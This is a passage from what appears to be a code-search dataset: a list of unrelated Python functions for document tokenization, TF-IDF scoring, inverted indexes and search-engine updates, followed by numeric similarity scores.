tokens_temp = []\n for tok, tok_start in tokens:\n only_tokens.append(tok)\n tokens_temp.append([tok, tok_start + token_start_index_offset])\n tokens = tokens_temp\n tokens_temp = None\n if self.stem_words:\n stemmed_tokens = stemmer.stem(only_tokens)\n else:\n stemmed_tokens = only_tokens\n for tup, tok_stem in zip(tokens, stemmed_tokens):\n tok, tok_start = tup\n wordtypes[tok] = True\n wordtypes[tok_stem] = True\n try:\n tok_num = wordtype_to_number[tok_stem]\n except:\n tok_num = len(wordtype_to_number)\n number_to_wordtype.append(tok_stem)\n wordtype_to_number[tok_stem] = tok_num\n token_numbers.append(unicode(tok_num))\n token_start_indices.append([tok, tok_start])\n text = u' '.join(token_numbers)\n w.write(u'{0} all {1}\\n'.format(subdoc_name, text))\n w2.write(unicode(json.dumps(token_start_indices)))\n token_start_index_offset += len(subdoc_content)\n for tok, tok_start in tokens:\n try:\n assert doc_content[tok_start:tok_start+len(tok)].lower() == tok.lower()\n except:\n 
print(tok_start)\n print(len(tok))\n print('\"'+doc_content[tok_start:tok_start+len(tok)].lower()+'\"')\n print('\"'+tok.lower()+'\"')\n raise\n if not count:\n raise Exception('No files processed.')\n # record which subdocuments belong to which documents\n with io.open(self.subdoc_to_doc_map_file, 'w', encoding='utf-8') as w:\n w.write(unicode(json.dumps(subdoc_to_doc_map)))\n with io.open(self.wordtype_to_number_file, 'w', encoding='utf-8') as w:\n w.write(unicode(json.dumps(wordtype_to_number)))\n with io.open(self.number_to_wordtype_file, 'w', encoding='utf-8') as w:\n w.write(unicode(json.dumps(number_to_wordtype)))\n with io.open(self.wordtype_file, 'w', encoding='utf-8') as w:\n w.write(unicode(json.dumps(wordtypes)))\n except: # cleanup\n self._cleanup(self.mallet_input_file)\n self._cleanup(self.subdoc_to_doc_map_file)\n self._cleanup(self.wordtype_to_number_file)\n self._cleanup(self.number_to_wordtype_file)\n self._cleanup(self.wordtype_file)\n self._cleanup(self.excluded_words_file)\n raise", "def current_word_PL(current_word, file_reader_last_read_list, doc_dict, nb_doc):\n word_posting_list = {} # { key = doc , value = score }\n for idx, file_reader_last_read in enumerate(file_reader_last_read_list):\n if file_reader_last_read[\"last_read\"][\"word\"] == current_word:\n docs = file_reader_last_read[\"last_read\"][\"doc_score_list\"]\n add_doc_in_posting_list(word_posting_list=word_posting_list, docs=docs)\n file_reader_last_read_list[idx]=read_line_and_update(file_reader_and_last_read=file_reader_last_read)\n for key, value in word_posting_list.items():\n tf = float(value) / doc_dict[int(key)]\n idf = math.log((float(nb_doc)/len(word_posting_list)),2)\n score = tf*idf\n word_posting_list[key]=score \n word_posting_list = sort_and_cast_doc_in_posting_list(word_posting_list=word_posting_list)\n return word_posting_list", "async def put_documents(self, collection, documents):\n await self.ensure_collection(collection)\n try:\n if SOLR_COMMIT_WITHIN:\n params = {'commitWithin': SOLR_COMMIT_WITHIN}\n else:\n params = {'commit': 'true'}\n await self.post(\n '/v2/collections/{}/update'.format(collection),\n params=params, json_data=documents\n )\n logger.info('Successfully indexed {} documents to collection {}'\n .format(len(documents), collection))\n except SolrError:\n logger.warning('Failed to put {} documents to collection {}'\n .format(len(documents), collection))\n raise", "def from_documents(cls, documents):\n # return cls.from_words(_itertools.chain(*documents))\n return cls.from_words(\n cls._build_new_documents(documents, cls.default_ws, pad_right=True)\n )", "def add_new_doc(self, document, end_of_corpus):\n max_tf = 0\n unique_terms_counter = 0\n document_dictionary = document.term_doc_dictionary\n # Go over each term in the doc\n for term in document_dictionary:\n try:\n # Update inverted index and posting\n if term not in self.inverted_idx:\n self.inverted_idx[term] = 1\n unique_terms_counter += 1\n else:\n self.inverted_idx[term] += 1\n if term not in self.posting_dict:\n self.posting_dict[term] = []\n\n self.posting_dict[term].append(\n (document.tweet_id, document_dictionary[term])) # key: str , value: array of tuples\n\n max_tf = max(document_dictionary[term], max_tf)\n\n except:\n\n print('problem with the following key {}'.format(term[0]))\n\n document.max_tf = max_tf\n document.unique_terms = unique_terms_counter\n self.docs_count += 1\n\n modulo = int(document.tweet_id) % 10\n self.documents[modulo][document.tweet_id] = [document.term_doc_dictionary, 
document.max_tf]\n\n if self.docs_count == self.DOCS_SIZE or end_of_corpus: # if we reach chunk size or end of corpus\n self.add_to_file(end_of_corpus)\n self.docs_count = 0\n self.posting_dict = {}\n\n for i in self.documents: # 0 - 9\n if self.documents[i].__len__() > 15000:\n doc = utils.load_obj(self.out + \"document\" + str(i))\n doc.update(self.documents[i])\n utils.save_obj(doc, self.out + \"document\" + str(i))\n self.documents[i] = {}", "def upload(self, documents: List[Document], vectorise_func) -> None:\n\n # Add doc_store to documents\n for d in documents:\n d.doc_store = self\n # Check ID uniqueness\n check_duplicate_documents(documents)\n # Check type consistency\n check_document_types(documents)\n # Batching\n batches = batch_items(documents)\n\n # Update document class conveniently\n if issubclass(type(documents[0]), ChunkedDocument):\n self._doc_class = ChunkedDocument\n\n for batch in batches:\n vectorise_func(batch, self)\n self.documents += batch", "def add_doc(self, document):\n # Split document up into list of strings\n #words = self.tokenize(document)\n words = document\n # Count word frequencies in this document\n word_counts = {}\n for word in words:\n word_counts[word] = word_counts.get(word, 0) + 1\n # Add word counts as new row to sparse matrix\n self.sparse.append(word_counts)\n # Add to total document count for each word\n for word in word_counts:\n self.doc_count[word] = self.doc_count.get(word, 0) + 1", "def _apply_mapping(self, document, mapping):\n if not mapping:\n return document\n new_document = {v: document[k] for k, v in mapping.items() if k in document}\n # Keep track of missing keys\n self.missing_keys.update([k for k in mapping if k not in document])\n\n # Document errors for missing documents\n if not new_document:\n self.failed += 1\n self.failed_ids.append(\n document.get(\"id\", document.get(\"ID\", document.get(\"_id\", None)))\n )\n return new_document", "def _merge_conllu_subtokens(self, lines: List[str], doc: Doc)-> Doc:\n # identify and process all subtoken spans to prepare attrs for merging\n subtok_spans = []\n for line in lines:\n parts = line.split(\"\\t\")\n id_, word, lemma, pos, tag, morph, head, dep, _1, misc = parts\n if \"-\" in id_:\n subtok_start, subtok_end = id_.split(\"-\")\n subtok_span = doc[int(subtok_start) - 1 : int(subtok_end)]\n subtok_spans.append(subtok_span)\n # create merged tag, morph, and lemma values\n tags = []\n morphs = {}\n lemmas = []\n for token in subtok_span:\n tags.append(token.tag_)\n lemmas.append(token.lemma_)\n if token._.merged_morph:\n for feature in token._.merged_morph.split(\"|\"):\n field, values = feature.split(\"=\", 1)\n if field not in morphs:\n morphs[field] = set()\n for value in values.split(\",\"):\n morphs[field].add(value)\n # create merged features for each morph field\n for field, values in morphs.items():\n morphs[field] = field + \"=\" + \",\".join(sorted(values))\n # set the same attrs on all subtok tokens so that whatever head the\n # retokenizer chooses, the final attrs are available on that token\n for token in subtok_span:\n token._.merged_orth = token.orth_\n token._.merged_lemma = \" \".join(lemmas)\n token.tag_ = \"_\".join(tags)\n token._.merged_morph = \"|\".join(sorted(morphs.values()))\n token._.merged_spaceafter = (\n True if subtok_span[-1].whitespace_ else False\n )\n\n with doc.retokenize() as retokenizer:\n for span in subtok_spans:\n retokenizer.merge(span)\n\n return doc", "def count_doc_frequencies(self, docs):\n frequencyIndex = {}\n doc_id = 0\n for doc in 
docs:\n for term in doc:\n if term not in frequencyIndex:\n frequencyIndex[term] = [doc_id]\n else:\n for id in frequencyIndex[term]:\n if doc_id == id:\n break\n else:\n frequencyIndex[term].append(doc_id)\n doc_id+=1\n\n for term in frequencyIndex:\n occurences = len(frequencyIndex[term])\n frequencyIndex[term] = occurences\n\n return frequencyIndex", "def set_documents(cls, input_list_text: List[str]) -> None:\n cls.documents = input_list_text", "def featurize(movies):\n ###TODO \n movies['features'] = \"\" \n get_h = set() \n vocab_dict = {}\n df_dict_return = {}\n tup_list = []\n index_dict = {}\n index_dict_1 = {}\n movie_len = len(movies) \n #print(\"MovieLength::\",movie_len)\n #print(\"MOVIES:::\",movies)\n \n get_h = cal_unique_features(movies) # num_features\n\n vocab_dict = cal_unique_vocab(get_h) # vocab complete\n\n len_vocab = len(get_h)\n \n df_dict_return = cal_unique_docs(get_h,movies) # df(i)\n\n for token in get_h :\n #tup_list.clear()\n #print(\"token_GOTTTTT:::\",token)\n for index,row in movies.iterrows(): \n #print(\"row_got::\",row)\n gen_list = row['tokens']\n #print(\"gen_list::\",gen_list)\n #mov_id = row['movieId'] \n #print(\"mov_id::\",mov_id)\n token_count_1 = Counter(gen_list).most_common()[:1]\n tok = token_count_1[0]\n index_dict_1[index] = tok[1]\n token_count = gen_list.count(token)\n #print(\"token_count::\",token_count)\n tup = (index,token_count)\n #print(\"tuple::\",tup)\n tup_list.append(tup)\n #print(\"LIST_PRINT:::::::::::::\",tup_list)\n index_dict[token] = tup_list\n tup_list = []\n \n \n #print(\"INDEX_DICT:::\",index_dict) # tf(i,d)\n #print(\"INDEX_DICT_1:::\",index_dict_1) # max_k dict per docx\n \n \n for ind, row in movies.iterrows():\n data_list = []\n rows_list = []\n columns_list = []\n gen_list = row['tokens']\n #print(\"TOKENS GOTTT::\",gen_list) \n for gen in gen_list:\n tf = get_tf_value(index_dict,gen,ind)\n #print(\"TF GOTTT::\",tf) \n tf_weight = float( tf / index_dict_1[ind])\n #print(\"tf_weight::\",tf_weight)\n df_weight = float( math.log10( movie_len / df_dict_return[gen] ) )\n #print(\"df_weight::\",df_weight)\n final_tfidf = tf_weight * df_weight\n #print(\"final_tfidf::\",final_tfidf)\n data_list.append(final_tfidf)\n columns_list.append(vocab_dict[gen])\n rows_list.append(0) \n csr = csr_matrix((data_list, (rows_list,columns_list)), shape=(1,len_vocab))\n #print(\"TYPE of CSR GOTT::\",type(csr))\n #print(\"CSR GOTT:::\",csr) \n movies.set_value(ind, 'features', csr)\n \n #print(\"UPDATE movies::\",movies) \n\n return(movies,vocab_dict)\n \n\n pass", "def index_terms(self):\n [[self.set_postings(term, id) for term in NLProcessor.process(doc)] for id, doc in\n self.doc_store.dict.iteritems()]", "def updateWordCounts():\n emaildata = loadEmailData()\n englishwords = importDictionary()\n countAllWords(emaildata, englishwords)", "def set_document_numbers(notices):\n\n if len(notices) > 1:\n for notice in notices:\n notice['document_number'] = split_doc_num(\n notice['document_number'], notice['effective_on'])\n return notices", "def set_document_numbers(notices):\n\n if len(notices) > 1:\n for notice in notices:\n notice['document_number'] = split_doc_num(\n notice['document_number'], notice['effective_on'])\n return notices", "def update(self, docs: DocumentArray, *args, **kwargs):\n cursor = self.connection.cursor()\n psycopg2.extras.execute_batch(\n cursor,\n f'UPDATE {self.table} SET DOC = %s WHERE ID = %s',\n [\n (\n doc.SerializeToString(),\n doc.id,\n )\n for doc in docs\n ],\n )\n self.connection.commit()", "def 
add_documents(self, docs):\n for doc in docs:\n assert isinstance(doc, pylastica.document.Document), \"All items in list docs must be of type Document: %r\" % doc\n doc.doc_type = self.name\n return self.index.add_documents(docs)", "def updateWordList(emailids):\n with open('res/dictionary.txt', 'r') as f:\n lines = f.readlines()\n words = set([line.strip() for line in lines])\n\n with open('res/dictionary.txt', 'a') as f:\n for emailid in emailids: \n email = e.Email(emailid)\n subject = set(email.parsedsubject)\n body = set(email.body)\n try:\n emailcontent = body.union(subject)\n for word in emailcontent:\n if not word in words:\n words.add(word)\n f.write(word + '\\n')\n except AttributeError:\n print(body)", "def update_documents(self, engine_name, documents):\n endpoint = \"engines/{}/documents\".format(engine_name)\n data = json.dumps(documents)\n\n return self.swiftype_session.request('patch', endpoint, data=data)", "def create_freq_dict(corpus, doc_info):\n for idx, content in enumerate(corpus):\n word_freq_table = {}\n splitted_sentence = content.split()\n for word in splitted_sentence:\n word = word.lower()\n if word not in word_freq_table:\n word_freq_table[word] = 1\n else:\n word_freq_table[word] += 1\n doc_info[idx]['freq_dict'] = word_freq_table", "def index_feats_dict(self):\n doc_features_dict = {}\n\n for index, doc in zip(self.index, self.series):\n # Sets for a doc and feature words\n doc_set = set(doc.split())\n feat_set = set(self.features)\n\n # Shared words between the two sets\n interset_words = doc_set.intersection(feat_set)\n\n # Append to doc_features_dict\n doc_features_dict[index] = list(interset_words)\n\n return doc_features_dict", "def pos():\n pos_list = []\n for token in doc:\n pos_list.append(token.pos_)\n setList = list(set(pos_list))\n my_dict = {i: pos_list.count(i) for i in setList}\n print(my_dict)", "def finish_documents():\n\n doc_ids = json.loads(request.form['doc_ids'])\n\n for docid in doc_ids:\n\n document = Document.query.filter_by(id=docid).first_or_404()\n\n document.status = \"OK\"\n\n db.session.add(document)\n\n db.session.commit()", "def test_update_list(self):\n u = stellr.UpdateCommand(TEST_HTTP)\n docs = [{'a': 1}, {'b': 2}]\n u.add_documents(docs)\n self.assertEqual(2, len(u._commands))\n self.assertEqual(u.body,\n ('{\"add\": {\"doc\": {\"a\": 1}}'\n ',\"add\": {\"doc\": {\"b\": 2}}}'))", "def add_documents(self, documents):\n\t\t\n\t\t# flag for StopIteration exceptions\n\t\tmore_documents = True\n\t\t# loop while there are still documents in the iterator\n\t\twhile more_documents:\n\t\t\t# increment batch number\n\t\t\tbatch = len(self.batch_stats) + 1\n\t\t\t# count sentences\n\t\t\tsentences_count = 0\n\t\t\t# create temporary batch data file in the version directory\n\t\t\tbatch_file = os.path.join(self.file_base.get_version_path(self.version), \"data.jl.gz.temp\")\n\t\t\t# try to read the next batch of files, catch exception and stop if there are no more\n\t\t\ttry:\n\t\t\t\t# get next document before opening the file just to make sure it's there\n\t\t\t\tdocument = documents.next()\n\t\t\t\t# open the data file\n\t\t\t\twith gzip.open(batch_file, \"wb\") as outfile:\n\t\t\t\t\t# loop through DOCUMENT_BATCH_SIZE documents\n\t\t\t\t\tfor i in range(DocumentDatabase.DOCUMENT_BATCH_SIZE):\n\t\t\t\t\t\t# count sentences in document\n\t\t\t\t\t\tfor paragraph in document[\"paragraphs\"]:\n\t\t\t\t\t\t\tsentences_count += len(paragraph[\"sentences\"])\n\t\t\t\t\t\t# write JSON to file one line at a 
time\n\t\t\t\t\t\toutfile.write(\"%s\\n\" % json.dumps(document))\n\t\t\t\t\t\t# if we are not done with this batch, retrieve the next document\n\t\t\t\t\t\tif i < DocumentDatabase.DOCUMENT_BATCH_SIZE - 1:\n\t\t\t\t\t\t\tdocument = documents.next()\n\t\t\texcept StopIteration:\n\t\t\t\t# the end of the documents stream, set the flag to False\n\t\t\t\tmore_documents = False\n\t\t\t# make sure the batch isn't empty\n\t\t\tif sentences_count > 0:\n\t\t\t\t# create the new batch in the file system\n\t\t\t\tself.version_batches.create_latest_version()\n\t\t\t\t# add the stats to the statistics hash\n\t\t\t\tself.batch_stats[batch] = BatchStats(sentences_count)\n\t\t\t\t# write the batch statistics to file\n\t\t\t\twith codecs.open(self._get_batch_stat_file(batch), \"wb\", \"utf-8\") as outfile:\n\t\t\t\t\t# write the JSON representation for the stats\n\t\t\t\t\toutfile.write(json.dumps(self.batch_stats[batch].to_json()))\n\t\t\t\t# move the temp data file to the correct location inside the version folder\n\t\t\t\tos.rename(batch_file, self._get_batch_file(batch))", "def get_preprocessed_docs(formatted_docs):\r\n preprocessed_docs = {}\r\n for idx in formatted_docs.keys():\r\n preprocessed_docs[idx] = preprocess(formatted_docs[idx])\r\n return preprocessed_docs", "def load_flattened_documents(data_dir: str, docids: Set[str]) -> Dict[str, List[str]]:\n unflattened_docs = load_documents(data_dir, docids)\n flattened_docs = dict()\n for doc, unflattened in unflattened_docs.items():\n flattened_docs[doc] = list(chain.from_iterable(unflattened))\n return flattened_docs", "def build(self,documents):\n\t\tself.vectorKeywordIndex = self.getVectorKeywordIndex(documents)\n\n\t\tself.documentVectors = [self.createVector(document) for document in documents]", "def _build_token_dict(self, corpus: List[List[str]], min_count: int = 3):\n token2idx = {\n self.token_pad: 0,\n self.token_unk: 1,\n self.token_bos: 2,\n self.token_eos: 3\n }\n\n token2count = {}\n for sentence in corpus:\n for token in sentence:\n count = token2count.get(token, 0)\n token2count[token] = count + 1\n\n # 按照词频降序排序\n sorted_token2count = sorted(token2count.items(),\n key=operator.itemgetter(1),\n reverse=True)\n token2count = collections.OrderedDict(sorted_token2count)\n\n for token, token_count in token2count.items():\n if token not in token2idx and token_count >= min_count:\n token2idx[token] = len(token2idx)\n\n self.token2idx = token2idx\n self.idx2token = dict([(value, key)\n for key, value in self.token2idx.items()])\n logging.debug(f\"build token2idx dict finished, contains {len(self.token2idx)} tokens.\")\n self.dataset_info['token_count'] = len(self.token2idx)", "def update_words(data, book_num):\n\tglobal word_count\n\t#find count of each word in the book and update the dictionary\n\tfor words in data:\n\t\tword_count[words][book_num] = (word_count.get(words,0)[book_num] + 1)\n\t#print(word_count)", "def generate_dict(self):\n dict = defaultdict(list)\n for i in range(self.no_of_docs-1):\n doc_txt = self.doc_to_df(i)\n #assign key to index in dictionary and its locations as tuples(docid,line,wordpos) as the values\n for j in range(len(doc_txt)):\n for k in range(doc_txt.shape[1]):\n key = doc_txt[k][j]\n dict[key].append((i,j,k))", "def parse_doc(self, doc_as_list):\n tweet_id = doc_as_list[0]\n tweet_date = doc_as_list[1]\n full_text = doc_as_list[2]\n url = doc_as_list[3]\n retweet_text = doc_as_list[4]\n retweet_url = doc_as_list[5]\n quote_text = doc_as_list[6]\n quote_url = doc_as_list[7]\n term_dict = {}\n 
tokenized_text = self.parse_sentence(full_text)\n doc_length = len(tokenized_text) # after text operations.\n\n for i, term in enumerate(tokenized_text):\n if term not in term_dict.keys():\n term_dict[term] = [1, [i]]\n else:\n term_dict[term][0] += 1\n term_dict[term][1].append(i)\n\n document = Document(tweet_id, tweet_date, full_text, url, retweet_text, retweet_url, quote_text,\n quote_url, term_dict, doc_length)\n return document", "def set(self, doc, fields_values):\n fields_values = Object.from_bson(fields_values)\n for k,v in fields_values.items():\n self._set(doc, k.split('.'), v)\n impl = self._impl(doc)\n return impl.update({'_id':doc._id}, {'$set':fields_values})", "def extract(self, documents):\n\n # Feature vector to return\n features = np.zeros((len(documents), len(self.idx_to_word)))\n\n # Raise an exception if 'extract' is called before 'preprocess'\n if len(self.word_to_idx) == 0 or len(self.idx_to_word) == 0:\n raise Exception(\"Dictionary not initialised.\")\n\n # Iterate over all documents\n for idx, doc in enumerate(documents):\n # Split the doc into a list of words\n words = extract_words(doc)\n\n # For each word\n for w in words:\n # Calculate it's frequency, however, keep in mind\n # that this word may not have been in the training\n # corpus. In that case, ignore the word.\n ''' YOUR CODE HERE '''\n try:\n features[idx][self.word_to_idx[w]] = words.count(w)\n except KeyError:\n pass\n\n ''' END CODE FOR THIS LOOP '''\n\n # Divide the vector by the total number of words in the document to\n # normalize the frequencies.\n ''' YOUR CODE HERE '''\n features[idx] = features[idx]/len(words)\n ''' END CODE FOR THIS LOOP '''\n\n return features", "def _vector_mapping(self) -> dict:\n words = set()\n for file in os.listdir(self.processed_path):\n doc_path = f\"{self.processed_path}/{file}\"\n with open(doc_path, 'r') as f:\n text_words = f.readline().split()\n words = words.union(set(text_words))\n words = list(words)\n words.sort()\n\n return dict(zip(words, range(len(words))))", "def add(self, token_docid):\n token = token_docid[0]\n doc_id = token_docid[1]\n # collapse identical tokens together\n if token in self.posting:\n self.posting[token].append(doc_id)\n else:\n self.posting[token] = [doc_id]", "def __call__(self, doc: Doc) -> Doc:\n for val in self._get_vals(doc):\n key = self._get_key(val)\n try:\n self._table.get(key).append(val)\n except AttributeError:\n self._table.set(key, [val])\n self._size += 1\n return super().__call__(doc)", "def __parse_corpus(self, corpus):\n corpus = self.__handle_corpus_unkwon_words(corpus)\n start_token = ' '.join([NGramModel.START_SENTENCE_TOKEN]*(self.__n-1))\n word_list = corpus.replace(NGramModel.START_SENTENCE_TOKEN, start_token).split()\n \n for n in range(1, self.__n+1): \n self.__ngram_counts[n] = {}\n for ngram, count in Counter(self.__generate_n_grams(word_list, n)).items():\n self.__ngram_counts[n][' '.join(ngram)] = count", "def documents(self, **kw):\r\n \r\n doc_reader = self.doc_reader\r\n return (doc_reader[docnum] for docnum in self.document_numbers(**kw))", "def merge_all_claims_norm_dicts_for_docs(): \n# docs_norm_scores_dicts_path = base_path+\"\\\\docs_norm_scores_dicts\"\n docs_norm_scores_dicts_path = linux_base_path+\"/docs_norm_scores_dicts\"\n# all_claims_norms_scores_merged_dict = base_path +\"\\\\all_claims_norms_scores_merged_dict\"\n all_claims_norms_scores_merged_dict = linux_base_path +\"/all_claims_norms_scores_merged_dict\"\n for alpha in range(0,11,1):\n for beta in range(0,10,1):\n 
docs_scores_all_claims = {}\n for filename in os.listdir(docs_norm_scores_dicts_path):\n (alpha_f,beta_f)=turn_to_float([alpha,beta])\n if \"_alpha_\"+str(alpha_f)+\"_\" in filename and \"_beta_\"+str(beta_f)+\"_\" in filename:\n curr_dict = read_pickle(docs_norm_scores_dicts_path+\"/\"+filename)\n docs_scores_all_claims = dict(docs_scores_all_claims.items() + curr_dict.items()) #merge dicts\n save_pickle(all_claims_norms_scores_merged_dict+\"/docs_norm_scores_all_claims_alpha_\"+str(alpha_f)+\"_beta_\"+str(beta_f),docs_scores_all_claims)", "def tokenize_replace_pos(doc_list, language_code, replace_pos,\n core_num=multiprocessing.cpu_count()):\n param = [[d, language_code, replace_pos] for d in doc_list]\n pool = multiprocessing.Pool(core_num)\n return pool.map(_tokenize_replace_pos4map, param)", "def refine_tokens( self, tokens ):\n k = 1.75\n b = 0.75\n stop_words_file = \"stop_words.txt\"\n all_stopwords = list()\n refined_tokens_sources = dict()\n \n # collect all the stopwords\n with open( stop_words_file ) as file:\n lines = file.read()\n all_stopwords = lines.split( \"\\n\" )\n \n for source in tokens:\n refined_tokens = dict()\n files = dict()\n inverted_frequency = dict()\n file_id = -1\n total_file_length = 0\n for item in tokens[ source ]:\n file_id += 1\n file_tokens = tokens[ source ][ item ].split(\" \")\n if source in \"name_desc_edam_help\":\n file_tokens = utils._clean_tokens( file_tokens, all_stopwords )\n total_file_length += len( file_tokens )\n term_frequency = dict()\n for token in file_tokens:\n if token is not '':\n file_ids = list()\n if token not in inverted_frequency:\n file_ids.append( file_id )\n else:\n file_ids = inverted_frequency[ token ]\n if file_id not in file_ids:\n file_ids.append( file_id )\n inverted_frequency[ token ] = file_ids\n # for term frequency\n if token not in term_frequency:\n term_frequency[ token ] = 1\n else:\n term_frequency[ token ] += 1\n files[ item ] = term_frequency\n N = len( files )\n average_file_length = float( total_file_length ) / N\n # find BM25 score for each token of each tool. It helps to determine\n # how important each word is with respect to the tool and other tools\n for item in files:\n file_item = files[ item ]\n file_length = len( file_item )\n for token in file_item:\n tf = file_item[ token ]\n # normalize the term freq of token for each document\n tf = float( tf ) / file_length\n idf = np.log2( N / len( inverted_frequency[ token ] ) )\n alpha = ( 1 - b ) + ( float( b * file_length ) / average_file_length )\n tf_star = tf * float( ( k + 1 ) ) / ( k * alpha + tf )\n tf_idf = tf_star * idf\n file_item[ token ] = tf_idf\n # filter tokens based on the BM25 scores and stop words. 
Not all tokens are important\n for item in files:\n file_tokens = files[ item ]\n tokens_scores = [ ( token, score ) for ( token, score ) in file_tokens.items() ]\n sorted_tokens = sorted( tokens_scores, key=operator.itemgetter( 1 ), reverse=True )\n refined_tokens[ item ] = sorted_tokens\n tokens_file_name = 'tokens_' + source + '.txt'\n token_file_path = os.path.join( os.path.dirname( self.tools_data_path ) + '/' + tokens_file_name )\n with open( token_file_path, 'w' ) as file:\n file.write( json.dumps( refined_tokens ) )\n file.close()\n refined_tokens_sources[ source ] = refined_tokens\n return refined_tokens_sources", "def build_ngram_index(tokenized_documents, ngrams):\n dictionary = {}\n\n doc_ngrams = {}\n for doc in tokenized_documents:\n ngrams_freq = {}\n\n measures = nltk.collocations.BigramAssocMeasures()\n finder = BigramCollocationFinder.from_words(tokenized_documents[doc])\n freqs = finder.ngram_fd\n for ngram in freqs:\n ngrams_freq[ngram] = freqs[ngram]\n \n measures = nltk.collocations.TrigramAssocMeasures()\n finder = TrigramCollocationFinder.from_words(tokenized_documents[doc])\n freqs = finder.ngram_fd\n for ngram in freqs:\n ngrams_freq[ngram] = freqs[ngram]\n\n doc_ngrams[doc] = ngrams_freq\n\n for ngram in ngrams:\n dictionary[ngram] = [0]\n for doc in doc_ngrams:\n if ngram in doc_ngrams[doc]:\n dictionary[ngram][0] += doc_ngrams[doc][ngram]\n dictionary[ngram].append((doc, doc_ngrams[doc][ngram]))\n \n return dictionary" ]
[ "0.68998206", "0.67045903", "0.63965476", "0.6270014", "0.6202376", "0.61885744", "0.6151995", "0.60434496", "0.60377157", "0.59981596", "0.59295934", "0.58968425", "0.5878697", "0.5846581", "0.5829846", "0.57702076", "0.57415456", "0.5731184", "0.571159", "0.56422395", "0.56206626", "0.56158304", "0.56098443", "0.5605549", "0.56044024", "0.5601467", "0.5599388", "0.5561202", "0.5560279", "0.55516464", "0.5550332", "0.5547204", "0.5522102", "0.55220526", "0.5517955", "0.5516518", "0.5508086", "0.5503605", "0.5489143", "0.54866636", "0.54812765", "0.54798603", "0.546946", "0.5467494", "0.5464095", "0.546391", "0.54616797", "0.5448641", "0.544098", "0.54241973", "0.54238206", "0.5410954", "0.5390047", "0.5376325", "0.53683513", "0.5364197", "0.5351491", "0.53480136", "0.5343806", "0.534199", "0.53341246", "0.53310096", "0.53275794", "0.5322643", "0.5319898", "0.5317479", "0.52941674", "0.52871186", "0.5282909", "0.52801293", "0.52791196", "0.52791196", "0.5277453", "0.5261558", "0.52605224", "0.52593344", "0.5257611", "0.5256494", "0.52483225", "0.5246229", "0.52368593", "0.5230774", "0.52286446", "0.5224301", "0.522175", "0.52179825", "0.52160466", "0.5212943", "0.521123", "0.5209256", "0.52077514", "0.52023995", "0.5199851", "0.51880676", "0.5183054", "0.5163004", "0.51602674", "0.51461196", "0.5139358", "0.5132946" ]
0.6872754
1
Get the list of token_id given doc.
def doc2id(self, doc):
    if isinstance(doc, string_types):
        raise TypeError("doc2idx expects an array of unicode tokens on input, not a single string")
    doc = map(self.process_token, doc)
    return [self.token_to_id(token) for token in doc]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def doc2id(self, doc):\n doc = map(self.process_token, doc)\n return [self.token_to_id(token) for token in doc]", "def get_tokens(self, document):\n raise NotImplementedError()", "def doc2token(self, doc):\n return [self.word2idx[word] if self.word2idx.__contains__(word)\n else self.word2idx['UNK'] for word in doc]", "def get_doc_ids(self):\n cursor = self.connection.cursor()\n cursor.execute(\"SELECT id FROM documents\")\n results = [r[0] for r in cursor.fetchall()]\n cursor.close()\n return results", "def get_doc_ids(self):\n cursor = self.connection.cursor()\n cursor.execute(\"SELECT id FROM documents\")\n results = [r[0] for r in cursor.fetchall()]\n cursor.close()\n return results", "def id2doc(self, ids):\n return [self.id_to_token(idx) for idx in ids]", "def id2doc(self, ids):\n return [self.id_to_token(idx) for idx in ids]", "def get_ids(self) -> List[str]:", "def tokens(self):\n return self.rpc.call(MsfRpcMethod.AuthTokenList)['tokens']", "def keys(self):\n return list(self.token2id.values())", "def get_ids(self,tokens, tokenizer, max_seq_length):\n token_ids = tokenizer.convert_tokens_to_ids(tokens,)\n input_ids = token_ids + [0] * (max_seq_length-len(token_ids))\n return input_ids", "def convert_ids_to_tokens(self, tok_ids):\n result = []\n for tok in tok_ids:\n word = self.itos(tok)\n result.append(word)\n return result", "def tok2idx_data(token2id, tok_data):\n idx_data = []\n for toks in tok_data:\n idx_lst = [\n token2id[tok] if tok in token2id else UNK_IDX for tok in toks]\n idx_data.append(idx_lst)\n return idx_data", "def convert_tokens_to_ids(self, tokens):\n ids = []\n for token in tokens:\n ids.append(self.vocab[token])\n if len(ids) > self.max_len:\n logger.warning('Token indices sequence length is longer than the specified maximum sequence length for this BERT model ({} > {}). 
Running this sequence through BERT will result in indexing errors'.format(len(ids), self.max_len))\n return ids", "def list_ids(token):\n\n init_tenant_context(token, db)\n\n data = []\n LOGGER.debug(f\" Fetching list with known devices\")\n for id in db.session.query(Device.id).all():\n data.append(id[0])\n return data", "def extarct_id_tf(docs):\n\n if len(docs) == 0:\n return []\n docs = docs.split(',')\n ret = []\n for doc in docs:\n doc = doc.split('|')\n # doc_id, tf\n ret.append((int(doc[0]), int(doc[1])))\n return ret", "def list_tokens(user):\n return AppSpecificAuthToken.select().where(AppSpecificAuthToken.user == user)", "def list(uid: int):\n\n return Token.list(uid)", "def convert_tokens_to_ids(self, tokens):\n ids = []\n if isinstance(tokens, str):\n if tokens in self.special_tokens:\n return self.special_tokens[tokens]\n else:\n return self.encoder.get(tokens, self.unk_id)\n for token in tokens:\n if token in self.special_tokens:\n ids.append(self.special_tokens[token])\n else:\n ids.append(self.encoder.get(token, self.unk_id))\n return ids", "def get_ids(self, text):\n\n tokens = [token.orth for token in self.tokenizer(text)]\n ids = []\n for token in tokens:\n try:\n id = self.vocab.vectors.key2row[token]\n except KeyError:\n id = self.oov_id\n\n ids.append(id)\n\n return ids", "def get_tokens(self) -> List[str]:\n return self.tokens", "def getReviewsWithToken(self, token):\n\n wordid = self.find_word_in_dictionary(token)\n # word is not in the dictionary\n if wordid == -1:\n print(\"Token is not in the dictionary\")\n return 0\n\n with open(self.doc_to_words_path, 'rb') as bin:\n tup = []\n while bin.tell() != os.fstat(bin.fileno()).st_size:\n # get wordid:\n docid_in_file = int.from_bytes(bin.read(4), 'big')\n # get frequency:\n frequency = int.from_bytes(bin.read(4), 'big')\n # count words:\n count = 0\n for i in range(frequency):\n wordid_in_file = int.from_bytes(bin.read(4), 'big')\n if wordid == wordid_in_file:\n count += 1\n tup.append(docid_in_file)\n tup.append(count)\n return tuple(tup)", "def decode_ids_to_tokens(self, tokens: List[int]) -> List[str]:\n token_list = self.tokenizer.ids_to_tokens(tokens)\n return token_list", "def _get_vocab_id_list(self, json_obj):\n return json_obj", "def get_ids(self, text):\n\n tokens = [token.orth for token in self.tokenizer(text)]\n ids = []\n for token in tokens:\n try:\n id = self._vocab.vectors.key2row[token]\n except 